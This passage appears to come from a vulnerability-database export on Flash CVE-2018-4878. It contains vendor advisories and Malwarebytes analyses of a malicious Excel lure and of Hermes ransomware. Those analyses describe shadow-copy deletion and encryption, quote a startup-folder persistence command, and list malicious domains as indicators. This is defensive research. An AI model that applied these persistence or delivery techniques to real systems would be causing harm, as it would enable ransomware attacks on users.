\n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Google Chrome \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2018-02-01T00:00:00", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4878 Use After Free Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-01T00:00:00", "id": "SMNTC-102893", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102893", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2022-01-31T21:54:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of QOSProvider objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-23T00:00:00", "type": "zdi", "title": "Adobe Flash Player QOSProvider attachMediaPlayerItemLoader Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877"], "modified": "2018-02-23T00:00:00", "id": "ZDI-18-178", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-178/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:54:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ATF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-18T00:00:00", "type": "zdi", "title": "Adobe Flash ATF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-18T00:00:00", "id": "ZDI-18-124", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-124/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "malwarebytes": [{"lastseen": "2018-03-05T18:51:30", "description": "Last week on Malwarebytes Labs, we explained [how to protect your computer from malicious cryptomining](<https://blog.malwarebytes.com/101/2018/02/how-to-protect-your-computer-from-malicious-cryptomining/>), we gave an [encryption 101](<https://blog.malwarebytes.com/threat-analysis/2018/02/encryption-101-shione-ransomware-case-study/>) lesson using ShiOne ransomware as a case study, and we offered an explanation about [SQL injection.](<https://blog.malwarebytes.com/security-world/business-security-world/2018/03/explained-sql-injection/>) We also released a report on [the state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) from its first resurgence in the fall until now.\n\nIn active malware, we discussed [how the RIG malvertising campaign uses cryptocurrency themes as a decoy](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy/>), how an old virus made its way onto a [Chinese DDoS bot](<https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/>), and how a [massive DDoS attack washed over GitHub](<https://blog.malwarebytes.com/threat-analysis/2018/03/massive-ddos-attack-washes-over-github/>).\n\nWe also drew your attention to our own [Chris Boyd](<https://twitter.com/paperghost>) appearing in [Jenny Radcliffe\u2019s Human Factor Podcast](<http://jennyradcliffe.com/the-deception-chronicles/>).\n\n### Other news\n\n * Does your endpoint solution [stop fileless attacks](<https://www.bricata.com/blog/fileless-attacks-security/>)? They are gaining traction, says a Ponemon Institute study. (Source: Bricata)\n * [Feedless](<https://www.theverge.com/2018/2/26/17046608/feedless-app-content-blocker-instagram-facebook-newsfeed>) is an iOS content blocker that takes the media out of social media. (Source: The Verge)\n * A serious remote code execution vulnerability in both the '[\u03bcTorrent](<https://thehackernews.com/2018/02/torrent-download-software.html>) desktop app for Windows and the newly launched '\u03bcTorrent Web' was reported. (Source: The Hacker News)\n * But apparently, the Torrent vulnerabilities have already been [fixed](<https://engineering.bittorrent.com/2018/02/22/httprpc-security-vulnerabilities-resolved-in-utorrent-bittorrent-and-utorrent-web/>). (Source: The BitTorrent Engineering Blog)\n * An [ad network](<https://arstechnica.com/information-technology/2018/02/ad-network-uses-advanced-malware-technique-to-conceal-cpu-draining-mining-ads/>) used an advanced malware technique to conceal CPU-draining mining ads. (Source: Ars Technica)\n * [US Supreme Court](<https://www.reuters.com/article/us-usa-court-microsoft/u-s-supreme-court-wrestles-with-microsoft-data-privacy-fight-idUSKCN1GB0GY>) wrestles with Microsoft data privacy fight. (Source: Reuters)\n * [Loapi](<http://www.newsweek.com/loapi-cryptocurrency-mining-malware-so-powerful-it-can-melt-your-phone-752517>) cryptocurrency mining malware is so powerful it can melt your phone. (Source: Newsweek)\n * [German government](<https://www.theguardian.com/world/2018/mar/01/german-government-intranet-under-ongoing-attack>) Intranet under ongoing attack. (Source: TheGuardian)\n * [Trustico](<https://www.bleepingcomputer.com/news/security/trustico-states-they-stored-private-keys-for-customers-ssl-certificates/>) states they stored private keys for customers' SSL certificates. (Source: Bleeping Computer)\n * [Flash exploit CVE-2018-4878](<https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign>) was spotted in the wild as part of massive malspam campaign. (Source: Morphisec)\n * [Equifax](<http://philadelphia.cbslocal.com/2018/03/01/equifax-hackers-stole-more/>) says hackers stole more than previously reported. (Source: CBS Philly)\n * Virus downs hundreds of [Tim Hortons](<https://www.ctvnews.ca/business/virus-downs-hundreds-of-tim-hortons-cash-registers-furious-owners-threaten-lawsuit-1.3821172>) cash registers; furious owners threaten lawsuit. (Source: CTV News)\n * [SgxSpectre](<https://www.bleepingcomputer.com/news/security/sgxspectre-attack-can-extract-data-from-intel-sgx-enclaves/>) attack can extract data from Intel SGX enclaves. (Source: Bleeping Computer)\n\nStay safe, everyone!\n\nThe post [Week in security (February 26 \u2013 March 4)](<https://blog.malwarebytes.com/security-world/week-in-security/2018/03/week-in-security-february-26-march-4/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-05T17:00:00", "type": "malwarebytes", "title": "Week in security (February 26 \u2013 March 4)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-03-05T17:00:00", "href": "https://blog.malwarebytes.com/security-world/week-in-security/2018/03/week-in-security-february-26-march-4/", "id": "MALWAREBYTES:026284ECC22DB2D1F343F9B66686DEF9", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-10T00:09:18", "description": "_Update (2018-02-06)_: Adobe has released a patch for this vulnerability. More information is available [here](<https://helpx.adobe.com/security/products/flash-player/apsb18-03.html>).\n\nWe tested this zero-day with a [proof-of concept](<https://blog.morphisec.com/cve-2018-4878-an-analysis-of-the-flash-player-hack>) that was made available. Rather than launching it from within Office, we turned it into a drive-by download attack. The animation below shows Malwarebytes blocking the exploit, and when the anti-exploit protection module is disabled, we can see the calculator launching.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flash_0_day.gif)\n\n- -\n\nA new Flash Player zero-day has been found in recent targeted attacks, as [reported by KrCERT](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>). The flaw, which exists in Flash Player 28.0.0.137 and earlier versions, allows an attacker to remotely execute malicious code. On February 1, Adobe published a [security advisory](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) acknowledging this zero-day:\n\n> Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.\n\nThreat actors used a decoy Microsoft Excel document to lure their intended target (some South Korea users) in order to infect them with a remote administration tool named ROKRAT. While not obvious at first, an ActiveX object has been embedded into the document and contains the Flash exploit. Highlighting cells reveals a small white rectangle that represents the embedded object:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/02/ActiveX.png)\n\nUpon opening the spreadsheet, one of several South Korean websites will be contacted via a GET request containing the following three parameters:\n\n * a unique identifier\n * the Flash Player version\n * the Operating System version\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/02/URL_request.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/URL_request.png> \"\" )\n\nThis is an important step because it retrieves a key used to decrypt the malicious shell code.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/02/decrypt.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/decrypt.png> \"\" )\n\nBy the time we had access to this sample, the websites hosting it were down, which proved to be a showstopper in the exploitation and payload. [Malwarebytes](<http://www.malwarebytes.com/premium>) detects the remote administration tool that was dropped, as well as blocks the sites known to have hosted the key and payload.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2018-4878.gif)\n\nAdobe has said it will issue a patch for this zero-day sometime during the week of February 5. In the meantime, users are advised to disable or uninstall the Flash Player. We expect that this exploit will be used in larger scale attacks, including via malicious spam. We will keep you updated of any further developments.\n\n### **Indicators of compromise**\n \n \n 1588-2040.co[.]kr/design/m/images/image/image.php?\n dylboiler.co[.]kr\n\nSWF exploit\n \n \n FEC71B8479F3A416FA58580AE76A8C731C2294C24663C601A1267E0E5C2678A0\n\nThe post [New Flash Player zero-day comes inside Office document](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-05T20:55:16", "type": "malwarebytes", "title": "New Flash Player zero-day comes inside Office document", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-05T20:55:16", "id": "MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-15T05:37:59", "description": "_This blog post was authored by @hasherezade, J\u00e9r\u00f4me Segura and Vasilios Hioureas._\n\nAt the end of January, the South Korean Emergency Response Team (KrCERT) [published](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player 28.0.0.137 and below, was distributed [via malicious Office documents](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) containing the embedded Flash exploit. Only a couple of weeks after the public announcement, [spam campaigns](<https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign>) were already beginning to pump out malicious Word documents containing the newly available exploit.\n\nWhile spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to use an already available [Proof-of-Concept](<https://blog.morphisec.com/cve-2018-4878-an-analysis-of-the-flash-player-hack>) and [package it as as a drive-by download](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flash_0_day.gif> \"\" ) instead.\n\nOn March 9th, [MDNC discovered](<https://malware.dontneedcoffee.com/2018/03/CVE-2018-4878.html>) that a less common, but more sophisticated exploit kit called [GreenFlash Sundown](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/>) had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a [North Korean hacking group](<http://baesystemsai.blogspot.ca/2017/10/taiwan-heist-lazarus-tools.html>). According to some reports, it may be a decoy attack and \"[pseudo-ransomware](<https://securingtomorrow.mcafee.com/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/>)\".\n\nBy checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/Call_to_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/Call_to_EK.png> \"\" )\n\nWe replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries part of the self hosted OpenX server. Instead, we found that it was hiding in the main page's source code.\n\nWe had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank [David Ledbetter](<https://twitter.com/ledtech3>) for that).\n\n### Hermes ransomware\n\nThe payload from this attack is Hermes ransomware, version 2.1.\n\n#### **Behavioral analysis**\n\nThe ransomware copies itself into `%TEMP%` under the name `svchosta.exe` and redeploys itself from that location. The initial sample is then deleted.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/dropped.png)\n\nThe ransomware is not particularly stealthy\u2014some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/alert.png)\n\nThe authors didn't bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and by this way it tries to force the user into accepting it. But even if we don't let the batch script be deployed, the main executable proceeds with encryption.\n\nThe batch script is responsible for removing the shadow copies and other possible backups:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/bat_content-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/bat_content-1.png> \"\" )\n\nIt is dropped inside C:\\Users\\Public along with some other files:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/in_public-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/in_public-1.png> \"\" )\n\nThe file \"PUBLIC\" contains a blob with RSA public key. It is worth noting that this key is unique on each run, so, the RSA key pair is generated per victim. Example:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/public_dropped-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/public_dropped-1.png> \"\" )\n\nAnother file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/unique_id-1-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/unique_id-1-1.png> \"\" )\n\nAnalyzing the blob header, we find the following information:\n\n * 0x07 - [PRIVATEKEYBLOB](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453\$v=vs.85\$.aspx>)\n * 0x02 - [CUR_BLOB_VERSION](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453\$v=vs.85\$.aspx>): 2\n * 0xA400 - ALG_ID: [CALG_RSA_KEYX](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549\$v=vs.85\$.aspx>)\n\nThe rest of the data is encrypted\u2014at this moment, we can guess that it is encrypted by the RSA public key of the attackers.\n\nThe same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/ransom-600x488.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/ransom.png> \"\" )\n\nThe interesting fact is that, depending on the campaign, in some of the samples the authors used [BitMessage](<https://wikipedia.org/wiki/Bitmessage>) to communicate with victims:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/bitmessage.png)\n\nThis method was used in the past by a few other authors, for example in [Chimera ransomware](<https://blog.malwarebytes.com/threat-analysis/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild/>), and by the author of original Petya in his affiliate programs.\n\nEncrypted files don't have their names changed. Each file is encrypted with a new key\u2014the same plaintext produces various ciphertext. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code). Below, you can see a visualization of a BMP file before and after being encrypted by Hermes: ![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/visuals.png)\n\nInside each file, after the encrypted content, there is a \"HERMES\" marker, followed by another blob:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/hermes_marker-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/hermes_marker-1.png> \"\" )\n\nThis time the blob contains an exported session key (0x01 : [SIMPLEBLOB](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453\$v=vs.85\$.aspx>)) and the algorithm identifier is AES (0x6611: [CALG_AES](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549\$v=vs.85\$.aspx>)). We can make an educated guess that it is the AES key for the file, encrypted by the victim's RSA key (from the generated pair).\n\nThe ransomware achieves persistence by dropping a batch script in the Startup folder:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/shortcut.png)\n\nThe script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/deploy_ransom.png)\n\nSo, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That's why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.\n\n### Inside the ransomware\n\n#### **Execution flow**\n\nAt the beginning of the execution, the ransomware creates a mutex named \"tech\":\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/create_mutex-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/create_mutex-1.png> \"\" )\n\nThe sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.\n\nFirst, the executable begins to dynamically load all its imports via a function at 4023e0:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/dynamicload-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/dynamicload-1.png> \"\" )\n\nIt then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian are found as the system language, it exits the process (0x419 being Russian, 422 Ukrainian, and 423 Belarusian).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/checkrussian-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/checkrussian-1.png> \"\" )\n\nIt then creates two subprocesses - cmd.exe. One that copies itself into directory appdata/local/temp/svchost.exe, and another that executes the copied file.\n\nIt also generates crypto keys using standard CryoptAquireCOntext libraries, and saves the public key and some kind of ID into the following files:\n\n**C:\\Users\\Public\\UNIQUE_ID_DO_NOT_REMOVE**\n\n**C:\\Users\\Public\\PUBLIC**\n\nAs mentioned earlier, it writes out a script to auto run on startup with contents: **start \"\" %TEMP%\\svchosta.exe **into the Start menu startup folder. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved out the public key into a file so that it can later find that key and continue encrypting using a consistent key throughout all executions.\n\nBelow is the function that calls all of this functionality sequentially, labeled:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/MainFucntionCalls-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/MainFucntionCalls-1.png> \"\" )\n\nIt proceeds to cycle all available drives. If it is CDRom, it will skip it. Inside the function, it goes through all files and folders on the drive, but skips a few key directories, not limited to Windows, Mozilla, and the recycling 